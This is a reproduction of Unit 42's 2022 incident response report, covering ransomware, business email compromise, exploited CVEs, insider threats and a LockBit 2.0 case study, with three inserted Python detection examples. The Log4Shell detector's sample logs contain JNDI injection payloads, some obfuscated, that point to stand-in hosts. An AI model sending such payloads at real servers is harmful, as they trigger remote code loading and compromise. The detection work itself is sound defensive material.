2022 - Unit42 - Incident Response Report

This document is Palo Alto Networks' 2022 Incident Response Report. It provides insights into common cyberthreats and recommendations for organizations to strengthen their security posture. The report found that over the past 12 months, 70% of incident response cases involved ransomware or business email compromise attacks. It provides details on these threats and others, including attacks targeting cloud environments. The report offers recommendations that any organization can implement to make themselves a harder target and reduce the impact of any security incidents.


INCIDENT RESPONSE REPORT 2022
Table of Contents

Executive Summary 5
01 How Incident Response Data Can Help Prevent Bad Days 7
02 What Attackers Are Going After in 2022 9
03 Spotlight: Ransomware—a Favorite Cash Cow for Cybercriminals 15
04 Spotlight: Business Email Compromise—Under the Radar, But Costly 22
05 Spotlight: Cloud Incidents—Low-Hanging Fruit for Threat Actors 24
06 Seven Issues Threat Actors Don’t Want You to Address 27
07 What Threat Actors Do Once They’re Inside a Network 29
08 Predictions: Follow the Money 32
09 If You Take Any Action to Protect Your Organization, Start With These Six Things 37
10 Conclusion: Securing Your Organization is a Journey, Not a Destination 39
Appendix: In-Depth Recommendations to Help Secure Your Organization 40
    Recommendations to Help Make Your Organization as a Whole More Secure 40
    Recommendations to Prevent Phishing Attacks 43
    Patching Recommendations to Keep Your Organization’s Systems Up to Date 44
    Recommendations to Secure Your Cloud Environment 44
    Recommendations to Prevent Business Email Compromise 45
Methodology 46
Unit 42 Incident Response Methodology 47
About Palo Alto Networks & Unit 42 48
Palo Alto Networks Prevent, Detect, and Respond Capabilities 49
Foreword

When it comes to cybersecurity, there is a risk to government, industry, and individual citizens alike. The world’s infrastructure, economy, and healthcare are increasingly dependent on digital systems, making it even more critical to align strategies and resources to best mitigate the risks and threats we are facing.

It is important to recognize that cybersecurity is no longer the responsibility of the few. It requires the constant vigilance and efforts of everyone throughout your organization. Because of the far-reaching ripple effects an attack can have across the digital ecosystem, we are seeing everyone, from boards to regulators, take a more active role, demanding greater transparency and the continuous demonstration of an organization’s preparedness to respond to the ever-evolving threat landscape.

A series of recent high-profile cyber attacks has spurred governments across the globe to propose new laws or regulations related to reporting significant cyber incidents, from the United States to the European Union, United Kingdom, Canada, Australia, India, and elsewhere. These requirements, if implemented appropriately, would serve to ensure governments have the visibility necessary to adequately respond to incidents affecting critical services and infrastructure, and ensure industry partners can effectively collaborate to defend against these threats.

In other cases, proposed rules would enhance public disclosure of material incidents by publicly traded companies, with a goal of ensuring boards and company executives are appropriately resourcing and implementing cybersecurity policies and procedures commensurate with that organization’s risk. The ultimate goal would be to improve an organization’s preparedness to withstand a cyberattack by ensuring executive-level oversight.

In order to prepare, organizations must first understand what they are up against. The “2022 Unit 42 Incident Response Report” sheds light on the risks and threats that organizations are facing. It provides insights into threat actors and their methods that can then be used to help organizations identify potential gaps in their defenses and areas to focus on to improve their cybersecurity stance going forward.
INCIDENT RESPONSE REPORT 2022 3


This year, business email compromises (BEC) and ransomware were the top incident types Unit 42 handled. Both types of attacks are prevalent because they generate fast, easy money for criminal groups. Beyond lining an attacker’s pockets, these breaches can be used to fund and inform subsequent criminal acts, including those sponsored by nation-states.

Ransomware in particular has been a focus area for many in the cybersecurity industry because of the impact on targeted organizations and those who depend on them. Ransomware threat actors gain control over critical data and resources and then leverage this control to coerce high-dollar payments from their victims. Unfortunately, these attacks have been made even easier with the rise of ransomware-as-a-service (RaaS) offerings.

Our job is to help break the cycle of illicit activity to protect the greater digital ecosystem. This report outlines recommendations that any organization can employ to strengthen its security posture and mitigate the impact of an incident. Implementing these best practices will go a long way toward making it harder and, therefore, less lucrative and appealing for threat actors to attack. Patching vulnerabilities, implementing multifactor authentication and fixing misconfigurations may not be exciting, but these foundational steps reduce an organization’s attack surface and ensure it is not an easy target.

Once the basics are covered, organizations can move to implement additional capabilities and defenses to address the more advanced hackers and tactics. The goal is to make it as difficult and costly as possible for attackers to succeed at any attack stage. It will take everyone being vigilant and working tirelessly to protect our connected, digital ecosystem, but this effort is vital if we are to ensure that ecosystem is always there and functioning to the benefit of us all.

Ciaran Martin
Founder and former CEO of the United Kingdom’s National Cyber Security Centre


Executive Summary

Every week brings news about threat actors—new campaigns, new groups, new types of attacks, new targets. Defenders can easily wind up playing catchup, but what does it take to flip the script?

SOC teams need to know where to focus defensive and network security efforts in a dynamic cyberthreat landscape. CISOs need to understand the greatest security risks they face, and where to prioritize scarce resources to reduce them.

Unit 42 has insights into hundreds of incident response cases, as well as global telemetry and threat intelligence gathered at a large scale, and we can use that to provide insights into today’s cyberthreat landscape—and where it might be headed.

Using a selection of over 600 incident response cases conducted over the past year, we identified these key patterns and trends:

• 70% of incident response cases over the past twelve months were ransomware and business email compromise (BEC).

• 77% of intrusions are suspected to be caused by three initial access vectors: phishing, exploitation of known software vulnerabilities and brute-force credential attacks—focused primarily on remote desktop protocol (RDP).

• More than 87% of positively identified vulnerabilities fell into one of six major categories: ProxyShell, Log4j, SonicWall, ProxyLogon, Zoho ManageEngine ADSelfService Plus and Fortinet.

• The 7 most targeted industries were finance, professional and legal services, manufacturing, healthcare, high tech, and wholesale and retail.

• 50% of targeted organizations lacked multifactor authentication on key internet-facing systems such as corporate webmail, virtual private network (VPN) solutions and other remote access solutions.


While there is no one-size-fits-all solution to protect your organization from cyberattacks, CISOs, SOC leaders, incident responders, security analysts, network defenders, and other professionals can use commonalities in our cases to understand what attackers are going after and how they’ve been successful. We accompany these insights with concrete recommendations on how to protect your organization. This is our way of sharing lessons from the incident response trenches to help bolster your security efforts.

We also asked our incident responders to look ahead to the cyberthreats on the horizon. They shared the following predictions:

• The window of time to patch high-profile vulnerabilities before exploitation will continue to shrink.

• The widespread availability of attack frameworks and hacking-as-a-service platforms will continue to increase the number of unskilled threat actors.

• Reduced anonymity and increased instability with cryptocurrency could lead to a rise in business email compromise or payment card-related website compromise.

• Declining economic conditions could push more people into cybercrime as a way to make ends meet.

• Hacktivism and politically motivated attacks will increase as motivated groups continue to hone their ability to leverage social media and other platforms to organize and target both public and private sector organizations seen as adversarial.

Alongside these predictions, we offer strategies for how you can get ahead of these future threats today.

In the pages that follow, we identify the top methods attackers used to gain initial access, as well as details on what led to the incident or allowed it to escalate. We provide an in-depth spotlight on several key incident types—ransomware, business email compromise, and cloud incidents. Finally, we share our top actionable recommendations for securing organizations based on our experience helping clients.


01
How Incident Response Data
Can Help Prevent Bad Days
Incident response services are there for you on a bad day. When
you need to use them, every second counts. At that moment,
you likely have a critical security incident to address and the top
priority is to contain and eradicate threats, recover, and restore
your organization’s ability to function as quickly as possible.

Reading about incident response can be a totally different experience.

You can do this at a much calmer moment, gaining insights from what’s gone wrong in the larger world so you know how to prepare your organization—and, we hope, successfully prevent some of those bad days.

For any type of incident response, the key questions remain the same: What did they do? How did they do it? Did they take anything? When our experts ask those questions, we learn what we need to help an individual client, and we build up a body of knowledge about how threat actors operate and how they gain access to systems.

Our incident responders say there are key pieces of advice they give to almost every client about how to recover from an incident and close security gaps moving forward.

You don’t have to wait until a bad day to get that advice. We’ve gathered our top insights from hundreds of recent cases and are sharing them here along with key tips for prevention and preparedness. You may still need to call on incident response services one day – threat actors can be determined and innovative. Our hope is that if you do, you’ll have some peace of mind even if you’re having a bad day as you make that call.

If you apply the top recommendations we share here, you’ll know that you’ve made a strong start toward preparing your organization for today’s threat landscape. You’ll have an understanding of your organization’s security posture so that if you do need to respond to a critical security incident, you’ll come at that effort with a foundation of confidence. You’ll know that you’ve taken steps to limit the damage threat actors can do within your systems and put measures in place to ease the recovery process.


How to Use This Report

If you’re a security leader:

Use the data in this report to help determine where to focus your resources. Pay close attention to What Attackers Are Going After in 2022 and Predictions: Follow the Money, and use these views of the current and future threat landscape to help you strategize about where your organization most needs protection.

Sharing the report with your Board could help start and support conversations about the resources you need to properly protect your organization and the potential impact of a breach. You may benefit from spotlights on specific challenges, including ransomware, business email compromise and cloud incidents—especially if these are areas of particular concern for you or your board. Consider sharing the report with your direct reports and security teams, too, so they can evaluate and implement recommendations in the areas you prioritize.

However you decide to steer your team, it’s worth taking a look at our incident responders’ top recommendations: If You Take Any Action to Protect Your Organization, Start With These Six Things. We recommend ensuring that your organization has these fundamentals covered since they would help prevent and mitigate many types of incidents that organizations commonly face.

If you’re a security practitioner:

This report includes many practical recommendations based on our incident responders’ on-the-ground experiences. Start with our team’s top recommendations—a set that is tailor-made to help prevent and mitigate many types of incidents that organizations commonly face. You’ll find them in the section titled, If You Take Any Action to Protect Your Organization, Start With These Six Things.

Once you’ve laid the foundation, move to the more in-depth recommendations that follow the conclusion. These are grouped based on the incident types they’re designed to address so you can focus your efforts on the issues that matter most to you and your leadership.

It may also benefit you to look closely at the sections on threat actor behavior. Seven Issues Threat Actors Don’t Want You to Address covers the seven security gaps that we most commonly observed threat actors using to their advantage. What Threat Actors Do Once They’re Inside a Network includes our observations of threat actors’ most commonly used capabilities after initial access. Both these sections can translate to practical guidance on where to shore up your organization’s defenses.

Consider sharing the report with your peers and leadership to coordinate your defense efforts and obtain buy-in on key approaches to protecting your organization.


02
What Attackers Are
Going After in 2022
If you know what attackers are going after, you know what you
most need to protect. Here’s what we found in our case data
about the most common incident types, how attackers are
gaining initial access, what vulnerabilities they’re exploiting,
and which industries they’re targeting.

Attackers’ financial motivations drive heavy use of ransomware and business email compromise.

Incident Types

Ransomware and BEC were the top attacks we responded to over the past 12 months, accounting for approximately 70% of our incident response cases.

While these two attacks are the primary ways threat actors can monetize illicit access to networks, attackers have and use additional strategies for financial gain. Threat actors have increasingly paired extortion with encryption (sometimes including added threats of informing customers or the press, or conducting a distributed denial-of-service attack). Some attackers focus on extortion alone. For example, 4% of our cases involved extortion without encryption—a technique distinct from ransomware that can be simpler to execute. In these cases, attackers coerce organizations into paying by threatening the release of customers’ data.

Our incident responders and threat intelligence analysts note that extortion without encryption is likely to rise. The efficacy of extortion tactics has even led some prominent threat actors associated with the Conti ransomware group to publicly state that they envision focusing their future efforts on attacking organizations through extortion alone.

Ransomware is a type of malware used by cybercriminals for financial gain. It is delivered in the same way any type of malware makes its way onto targeted systems (e.g., through known vulnerabilities, already compromised systems, social engineering tactics, etc.). Once deployed, the ransomware will encrypt the organization’s files and render them unusable to the organization. The attacker demands ransom, promising to provide a decrypter and not further disclose the client’s data or identity in exchange.

Business Email Compromise (BEC) is a category of threat activity involving sophisticated scams which target legitimate business email accounts through social engineering (e.g., phishing) or other computer intrusion activities. Once businesses are compromised, cybercriminals leverage their access to initiate or redirect the transfer of business funds for personal gain.


Figure 1: Types of Investigations Conducted by Unit 42 in 2022

• Ransomware 36%
• Business Email Compromise (BEC) 34%
• Network Intrusion 14%
• Insider Threat 5%
• Extortion – No Encryption 4%
• Other Digital Forensics 2%
• Exposure Investigation 1%
• PCI Investigation 1%
• Web App Compromise 1%
• Other Types <1%

Attackers are looking for easy ways in.

Suspected Means of Initial Access

The top three access vectors for threat actors were phishing, exploitation of known software vulnerabilities and brute-force credential attacks—focused primarily on remote desktop protocol (RDP). These three attack vectors totaled over 77% of the suspected root causes for intrusions. Of note, the next most commonly used means of access for threat actors was leveraging previously compromised credentials.

Remote Desktop Protocol (RDP) is a protocol on Microsoft Windows systems that is designed to allow users to connect to and control a remote system. Common legitimate uses include allowing IT support to remotely control a user’s system to fix an issue, allowing access to virtual machines in cloud environments and remotely managing cloud assets. Unfortunately, it is easy to expose RDP unintentionally, which has led to it becoming a popular initial attack vector among threat actors.
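The brute-force vector described above shows up in the Windows Security log as a burst of failed logons (event 4625) from one source address, often followed by a success (event 4624) for whichever account finally gave in. The detection below is an added example written for this page, not code from the report or from Unit 42. The events it runs over are constructed, the threshold and window are arbitrary tuning choices, and the logon-type handling carries a practitioner caveat: when Network Level Authentication is enabled, failed RDP attempts are recorded with logon type 3 (network) rather than 10 (RemoteInteractive), so a rule that only watches type 10 misses them.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

THRESHOLD = 5                     # failures from one IP ...
WINDOW = timedelta(minutes=2)     # ... inside this window raise an alert
RDP_LOGON_TYPES = {10, 3}         # 10 = RemoteInteractive; 3 = Network, which is how
                                  # NLA-protected hosts log failed RDP attempts

# Constructed, simplified Windows Security events (fields lifted from 4625/4624).
# Not real telemetry.
EVENTS = [
    # password spray from 203.0.113.77: six failures in ~65 s, then a success
    {"time": "2022-04-02T03:10:01", "id": 4625, "logon_type": 10, "user": "Administrator", "ip": "203.0.113.77"},
    {"time": "2022-04-02T03:10:14", "id": 4625, "logon_type": 10, "user": "admin",         "ip": "203.0.113.77"},
    {"time": "2022-04-02T03:10:27", "id": 4625, "logon_type": 10, "user": "backup",        "ip": "203.0.113.77"},
    {"time": "2022-04-02T03:10:40", "id": 4625, "logon_type": 10, "user": "svc_backup",    "ip": "203.0.113.77"},
    {"time": "2022-04-02T03:10:53", "id": 4625, "logon_type": 10, "user": "svc_backup",    "ip": "203.0.113.77"},
    {"time": "2022-04-02T03:11:06", "id": 4625, "logon_type": 10, "user": "svc_backup",    "ip": "203.0.113.77"},
    {"time": "2022-04-02T03:11:30", "id": 4624, "logon_type": 10, "user": "svc_backup",    "ip": "203.0.113.77"},
    # NLA-enabled host: the failed RDP attempts surface as logon type 3
    {"time": "2022-04-02T03:12:00", "id": 4625, "logon_type": 3,  "user": "Administrator", "ip": "198.51.100.9"},
    {"time": "2022-04-02T03:12:05", "id": 4625, "logon_type": 3,  "user": "Administrator", "ip": "198.51.100.9"},
    {"time": "2022-04-02T03:12:10", "id": 4625, "logon_type": 3,  "user": "Administrator", "ip": "198.51.100.9"},
    {"time": "2022-04-02T03:12:15", "id": 4625, "logon_type": 3,  "user": "Administrator", "ip": "198.51.100.9"},
    {"time": "2022-04-02T03:12:20", "id": 4625, "logon_type": 3,  "user": "Administrator", "ip": "198.51.100.9"},
    # benign: one typo by an internal admin, then a success
    {"time": "2022-04-02T08:00:00", "id": 4625, "logon_type": 10, "user": "jdoe", "ip": "10.0.0.5"},
    {"time": "2022-04-02T08:00:09", "id": 4624, "logon_type": 10, "user": "jdoe", "ip": "10.0.0.5"},
    # benign: console logon, not RDP at all
    {"time": "2022-04-02T08:05:00", "id": 4624, "logon_type": 2,  "user": "jdoe", "ip": "-"},
]


def detect_rdp_bruteforce(events, threshold=THRESHOLD, window=WINDOW):
    """Return one alert per source IP that produced >= threshold RDP logon
    failures inside `window`, noting any later RDP success from that IP."""
    recent = defaultdict(deque)    # ip -> failure timestamps still inside the window
    failures = defaultdict(int)    # ip -> total failures seen
    users = defaultdict(set)       # ip -> account names tried
    alerts = {}                    # ip -> alert record

    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["logon_type"] not in RDP_LOGON_TYPES:
            continue
        ip, ts = ev["ip"], datetime.fromisoformat(ev["time"])
        if ev["id"] == 4625:
            failures[ip] += 1
            users[ip].add(ev["user"].lower())
            q = recent[ip]
            q.append(ts)
            while ts - q[0] > window:            # slide the window forward
                q.popleft()
            if len(q) >= threshold or ip in alerts:
                alerts.setdefault(ip, {"ip": ip, "first_seen": q[0].isoformat(), "success_user": None})
                alerts[ip].update(failures=failures[ip], users=sorted(users[ip]))
        elif ev["id"] == 4624 and ip in alerts:
            # a success from an IP that was already brute-forcing: the account it got
            alerts[ip]["success_user"] = ev["user"]
    return list(alerts.values())


if __name__ == "__main__":
    for alert in detect_rdp_bruteforce(EVENTS):
        print(alert)
```

Two alerts come out of the sample: the spraying host, whose record names svc_backup as the account that eventually authenticated and is therefore the first thing to reset, and the type-3 burst from the NLA host, which a type-10-only rule would have ignored. Including type 3 also sweeps in SMB failures, so in production the rule is normally paired with the destination host's role or with RDP connection events from the TerminalServices logs.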


Figure 2: Suspected Means of Initial Access

• Phishing 37%
• Software Vulnerabilities 31%
• Brute-force Credential Attacks 9%
• Previously Compromised Credentials 6%
• Insider Threat 5%
• Social Engineering 5%
• Abuse of Trusted Relationship(s) / Tool(s) 4%
• Others 3%

How do organizations find out they’ve been compromised?

Often, organizations notice an alert or find software that shouldn’t be installed, signaling that something odd is going on in the network.

Other times, the threat actor reveals their presence by popping up with a ransom note.

Sometimes, it gets stranger than that. In one case, a threat actor compromised a series of identification photos and other sensitive scanned documents, then stitched the images into a mosaic depicting a famous character related to the threat actor’s moniker as proof of exfiltration.

A few key vulnerabilities have become attackers’ favorites.

Exploited Vulnerabilities

For cases where responders positively identified the vulnerability exploited by the threat actor, more than 87% of them fell into one of six CVE categories. The primary categories and their corresponding CVEs, where available, are:

• ProxyShell (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207)
• Log4j
• SonicWall CVEs
• ProxyLogon (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065)
• Zoho ManageEngine ADSelfService Plus (CVE-2021-40539)
• Fortinet CVEs

Figure 3: Exploited Vulnerabilities in Unit 42 Cases

• ProxyShell 55%
• Log4j 14%
• SonicWall CVEs 7%
• ProxyLogon 5%
• Zoho ManageEngine ADSelfService Plus 4%
• Fortinet CVEs 3%
• Other Vulnerabilities 13%


Log4Shell

On Dec. 9, 2021, a zero-day remote code execution (RCE) vulnerability in Apache Log4j 2 was identified as being exploited in the wild. Public proof-of-concept (PoC) code was released and subsequent investigation revealed that exploitation was incredibly easy to perform. What followed was a series of events that will go down in cybersecurity history.

RCE vulnerabilities are often high severity because they allow an attacker to execute malicious code on a system, but this vulnerability had a particularly far-reaching impact. Log4Shell was rated a 10 on the Common Vulnerability Scoring System (CVSS)—the highest possible score. And while Apache Log4j 2 may not have been a household name outside the technical community, the software underlies a large number of well-known services and systems. Organizations all over the globe had vulnerable systems (whether or not they knew it), and mass scanning activities seeking these vulnerable systems began almost immediately.

Unit 42 researchers monitored hits on the Apache Log4j Remote Code Execution Vulnerability Threat Prevention signature, which allowed us to gain visibility into exploitation attempts. Between Dec. 10, 2021, and Feb. 2, 2022, we observed almost 126 million hits triggering the signature. While the largest number of hits occurred in days immediately following public knowledge of the vulnerability (Dec. 12-16), spikes of hits continued to take place throughout that entire period.

When we investigated what would have happened had the hits on our Threat Prevention signature been successful, we observed a wide range of attempted activities: vulnerable server identification via mass scanning, the installation of backdoors to exfiltrate sensitive information and to install additional tools, the installation of coin mining software for financial gain and many more.

Before long, incident response cases also began to appear. Log4j accounts for 14% of cases where responders positively identified the vulnerability exploited by the threat actor—despite only being public for a few months of the time period we studied.

“Log4Shell is not the first vulnerability garnering significant public interest, and it almost certainly won’t be the last. That’s why it’s important to look at Log4Shell both as a standalone vulnerability that demands discrete analysis and reflection, and as the latest in a string of national-level vulnerabilities that impact federal systems, critical infrastructure, and state and local networks alike.”

Jen Miller-Osborn, Unit 42 Deputy Director of Threat Intelligence
Written testimony submitted to the Homeland Security and Governmental Affairs Committee of the U.S. Senate
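The mass scanning described above worked by placing a JNDI lookup into any request field the target might log, and scanners quickly started hiding the string jndi behind Log4j's own lookup syntax (for example ${lower:j} or ${::-j}) to slip past naive string matches. The detector below is an added example written for this page; it is not code from the report and not Unit 42's Threat Prevention signature. It collapses those obfuscation lookups the way the vulnerable logger would before searching for jndi:. The access-log lines it runs over are constructed, and the set of lookups it evaluates (lower, upper, and the :- default-value form) is a deliberate subset of the tricks seen in the wild.

```python
import re

# Constructed web-server access-log lines (not from the report). The User-Agent
# field carries JNDI lookups in plain and obfuscated forms typical of Log4Shell scans.
SAMPLE_LOG_LINES = [
    '198.51.100.7 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:14:02:12 +0000] "GET /login HTTP/1.1" 200 912 "-" "${${lower:j}ndi:${lower:l}${lower:d}ap://203.0.113.9/x}"',
    '203.0.113.10 - - [10/Dec/2021:14:02:13 +0000] "GET /api HTTP/1.1" 404 0 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.10/o}"',
    '203.0.113.11 - - [10/Dec/2021:14:02:14 +0000] "GET /x HTTP/1.1" 200 1 "-" "${${env:NOPE:-j}ndi:dns://203.0.113.11/z}"',
    '192.0.2.5 - - [10/Dec/2021:14:02:15 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '192.0.2.6 - - [10/Dec/2021:14:02:16 +0000] "GET /pricing?plan=${basic} HTTP/1.1" 200 700 "-" "curl/7.68.0"',
]

# A ${...} lookup with no further ${ nested inside it.
INNERMOST_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
JNDI = re.compile(r"jndi:([a-z]+)", re.IGNORECASE)


def _resolve(body):
    """Evaluate one innermost Log4j lookup the way the vulnerable logger would,
    for the handful of lookups attackers use to hide the letters of 'jndi'."""
    low = body.lower()
    if low.startswith("jndi:"):
        return body                      # the lookup we are hunting for: keep its text
    if ":-" in body:                     # ${env:NOPE:-j} or ${::-j}: the default value wins
        return body.split(":-", 1)[1]
    if low.startswith("lower:"):
        return body[6:].lower()
    if low.startswith("upper:"):
        return body[6:].upper()
    return body                          # unknown lookup: unwrap it; this never hides 'jndi:'


def normalize_lookups(text, max_rounds=50):
    """Collapse innermost lookups repeatedly until the string stops changing."""
    for _ in range(max_rounds):
        new = INNERMOST_LOOKUP.sub(lambda m: _resolve(m.group(1)), text)
        if new == text:
            return text
        text = new
    return text                          # pathological nesting: return what we have


def find_log4shell_attempts(lines):
    """Return one record per log line that carries a JNDI lookup after de-obfuscation."""
    hits = []
    for line in lines:
        normalized = normalize_lookups(line)
        m = JNDI.search(normalized)
        if m:
            hits.append({
                "client": line.split(" ", 1)[0],          # first field of the access-log line
                "protocol": m.group(1).lower(),           # ldap, rmi, dns, ...
                "payload": normalized[m.start():m.start() + 80],
            })
    return hits


if __name__ == "__main__":
    for hit in find_log4shell_attempts(SAMPLE_LOG_LINES):
        print(hit)
```

Four of the six lines are flagged, including the three obfuscated ones, while the legitimate ${basic} query parameter is left alone because unwrapping it yields nothing resembling jndi:. The de-obfuscation step is what separates this from a plain grep for jndi, and it generalizes: any lookup the detector does not understand is unwrapped rather than dropped, so a new trick can only ever reveal more of the payload, never hide it.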


Zoho ManageEngine ADSelfService Plus

On Sept. 16, 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released an alert warning that advanced persistent threat (APT) actors were actively exploiting newly identified vulnerabilities in a self-service password management and single sign-on solution known as Zoho ManageEngine ADSelfService Plus.

Building upon the findings of that initial report, on Nov. 7, Unit 42 disclosed a second, more sophisticated, active and difficult-to-detect campaign that had resulted in the compromise of at least nine organizations.

By Dec. 2, the number of targets had grown to 13 across the technology, defense, healthcare, energy, finance and education industries, and we had identified patterns consistent with a persistent campaign (tracked as TiltedTemple). The actor continued to conduct reconnaissance against these industries and others, including infrastructure associated with five U.S. states.

Our threat intelligence analysts believe that the actor’s primary goal involved gaining persistent access to the network and the gathering and exfiltration of sensitive documents from compromised organizations.

While the vulnerability in Zoho ManageEngine ADSelfService Plus accounts for only 4% of cases where responders positively identified the vulnerability exploited by the threat actor, the TiltedTemple campaign illustrates how a determined threat actor can use a vulnerability as a doorway to extensive malicious activity.

Attackers follow the money when targeting industries.

Industries Affected: Cases by Industry

The top affected industries were finance, professional and legal services, manufacturing, healthcare, high tech, and wholesale and retail. These industries accounted for over 60% of our cases. Organizations within these industries store, transmit and process high volumes of monetizable sensitive information that attracts threat actors.

Attackers may at times purposely target certain industries—for example, financial organizations because they frequently conduct wire transfers, or healthcare organizations because they may be particularly motivated to avoid operational disruptions. However, many attackers are opportunistic, simply scanning the internet in search of systems where they might leverage specific vulnerabilities. In some cases, industries may have been particularly affected not because attackers intended to target them but because, for example, organizations in those industries happen to make widespread use of certain software with known vulnerabilities.


Figure 4: Top Affected Industries in 2022 (bar chart of record count, 0 to 90, by industry: Finance, Professional & Legal Services, Manufacturing, Healthcare, High Technology, Wholesale & Retail, Education, Hospitality)

But not all motivations are financial. Grudges matter, too.

Insider Threats

Insider threats were not the most common type of incident we handled—5.4%—but they can be significant because they involve a malicious actor who knows exactly where to look to find sensitive data. Seventy-five percent of our insider threat cases pertained to a disgruntled ex-employee who left with company data, destroyed company data, or accessed company networks after their departure.

However, our consultants note that many attacks that appear initially to be insider threats turn out to come from cybercriminals who, for instance, purchased stolen credentials. With mature markets for illicit initial access available, differentiating between legitimate user access and malicious user access is becoming more challenging.

Key Insight: Insider threats often involve theft of intellectual property. Our incident responders report many ways this can happen, including:

• Transferring data to personal accounts (especially possible when remote work allows an employee to simply shut off a VPN).

• Physically transporting corporate property to a competitor’s location.

• Using inside knowledge to locate and hire the same contractors and support staff, who then may have access to privileged information.

75% of insider threat cases were caused by a disgruntled ex-employee with enough sensitive data to become a malicious threat actor.
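The “accessed company networks after their departure” pattern above usually comes down to an offboarding gap: an account HR considers terminated that the directory still has enabled, plus authentications that land after the last working day. The reconciliation below is an added example written for this page, not a Unit 42 tool and not from the report. The HR feed, directory export and authentication log lines are constructed, the log line format is an assumption, and so is the rule that access should end at the close of the last working day (UTC); adjust both to local systems and policy.

```python
import re
from datetime import datetime, timedelta, timezone

# Constructed HR offboarding feed: account name and last working day (UTC date).
HR_TERMINATIONS = [
    {"account": "jdoe", "last_day": "2022-03-11"},
    {"account": "mlee", "last_day": "2022-03-18"},
]

# Constructed directory export: whether each account is still enabled.
DIRECTORY_ENABLED = {"jdoe": True, "mlee": False, "asmith": True}

# Constructed VPN / SSO authentication log lines (format assumed for this example).
AUTH_LOG = [
    "2022-03-10T17:55:02Z vpn LOGIN_OK user=jdoe src=203.0.113.5",
    "2022-03-14T02:13:44Z vpn LOGIN_OK user=jdoe src=198.51.100.23",
    "2022-03-20T09:01:10Z sso LOGIN_FAIL user=mlee src=198.51.100.40",
    "2022-03-21T09:02:30Z sso LOGIN_OK user=asmith src=192.0.2.8",
]

EVENT_RE = re.compile(r"^(\S+) (\S+) (LOGIN_OK|LOGIN_FAIL) user=(\S+) src=(\S+)$")


def departure_cutoffs(terminations):
    """Map account -> instant after which any authentication counts as post-departure.
    Assumption: access should end at the close of the last working day (UTC)."""
    return {
        t["account"].lower():
            datetime.fromisoformat(t["last_day"]).replace(tzinfo=timezone.utc) + timedelta(days=1)
        for t in terminations
    }


def stale_accounts(terminations, directory_enabled, as_of_date):
    """Departed accounts still enabled in the directory as of `as_of_date` (ISO date)."""
    as_of = datetime.fromisoformat(as_of_date).replace(tzinfo=timezone.utc)
    cutoffs = departure_cutoffs(terminations)
    return sorted(acct for acct, cut in cutoffs.items()
                  if as_of >= cut and directory_enabled.get(acct, False))


def post_departure_auth(terminations, log_lines):
    """Authentication events, successful or not, by departed accounts after their cutoff.
    Failed attempts are kept: someone is still trying those credentials."""
    cutoffs = departure_cutoffs(terminations)
    findings = []
    for line in log_lines:
        m = EVENT_RE.match(line)
        if not m:
            continue                                  # unparseable line: skip, do not guess
        ts_text, system, result, user, src = m.groups()
        ts = datetime.fromisoformat(ts_text.replace("Z", "+00:00"))
        cut = cutoffs.get(user.lower())
        if cut is not None and ts >= cut:
            findings.append({
                "user": user, "when": ts_text, "system": system, "result": result,
                "src": src, "days_after_departure": (ts - cut).days,
            })
    return findings


if __name__ == "__main__":
    print("still enabled:", stale_accounts(HR_TERMINATIONS, DIRECTORY_ENABLED, "2022-03-22"))
    for f in post_departure_auth(HR_TERMINATIONS, AUTH_LOG):
        print(f)
```

Run against the sample data the check surfaces the two things the report's insider cases turn on: jdoe was never disabled and authenticated to the VPN two days after leaving, and mlee's credentials were still being tried (unsuccessfully) after that account was disabled. Whether the second finding is the ex-employee or a buyer of leaked credentials is exactly the distinction the consultants above say is getting harder to draw, which is why the source address is kept in the record.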


03
Spotlight: Ransomware
A FAVORITE CASH COW FOR CYBERCRIMINALS

Ransomware has grabbed attention in recent years. It sometimes seems as if every week brings new high-profile headlines about multimillion dollar demands from threat actors. The choice of targets has at times been disturbing, including hospitals and other organizations that people depend on for the needs of daily life.

Ransomware can disrupt daily operations, causing significant headaches and financial pressure. Increasingly, affected organizations can also expect threat actors to use double extortion, threatening to publicly release sensitive information if a ransom isn’t paid.

Cybercriminals have displayed innovation on the one hand—introducing sophisticated attack tools, extortion techniques, and marketing campaigns. On the other hand, the RaaS business model has lowered the technical bar for entry by making powerful tools accessible to wannabe cyber extortionists with easy-to-use interfaces and online support.

What follows is a set of observations from our case data that highlight the impact that ransomware has had on various industries.

Multi-extortion techniques, including double extortion, occur when attackers not only encrypt the files of an organization, but also name and shame the targets and/or threaten to launch additional attacks (e.g., distributed denial of service, known as DDoS) to encourage organizations to pay more quickly. Many ransomware groups maintain dark web leak sites for the purpose of double extortion.

Ransomware as a service (RaaS) is a business for criminals, by criminals, with agreements that set the terms for providing ransomware to affiliates, often in exchange for monthly fees or a percentage of ransoms paid. RaaS makes carrying out attacks that much easier, lowering the barrier to entry for would-be threat actors and expanding the reach of ransomware. Unit 42 is actively tracking at least 56 active RaaS groups, some of which have been operating since 2020. Due to the success of these groups, we expect activity of this type to continue to grow.


SPOTLIGHT: RANSOMWARE—A FAVORITE CASH COW FOR CYBERCRIMINALS

Case Study: LockBit 2.0 Ransomware

LockBit 2.0 is a rebrand of LockBit ransomware and has become one of the most common ransomware variants that organizations are facing this year.

LockBit 2.0 is offered as ransomware as a service (RaaS), but represents a departure from the usual RaaS storyline. While in many cases, RaaS appeals to less technically savvy threat actors, LockBit 2.0 operators allegedly only work with experienced penetration testers, especially those experienced with tools such as Metasploit and Cobalt Strike. This can make it more challenging for organizations to defend against the variant. Affiliates are tasked with gaining initial access to the targeted network, allowing LockBit 2.0 to conduct the rest of the attack.

LockBit 2.0 is also known for its extensive use of double- and multi-extortion techniques. The group maintains a leak site – a website located on the dark web where names and details about compromised organizations are posted and shared in order to increase the pressure to pay a ransom. In addition, LockBit 2.0 operators have been known to perform distributed denial-of-service (DDoS) attacks against compromised organizations’ infrastructure to raise the volume even higher—a technique known as triple extortion.

